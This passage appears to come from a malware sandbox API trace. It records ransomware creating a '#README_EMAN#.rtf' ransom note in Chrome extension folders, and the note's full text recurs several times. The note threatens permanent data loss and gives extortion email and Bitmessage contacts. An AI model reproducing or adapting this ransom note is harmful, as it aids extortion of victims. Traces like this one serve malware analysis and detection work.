bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.749] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.749] CloseHandle (hObject=0x228) returned 1 [0284.749] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0284.749] GetLastError () returned 0x2 [0284.749] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 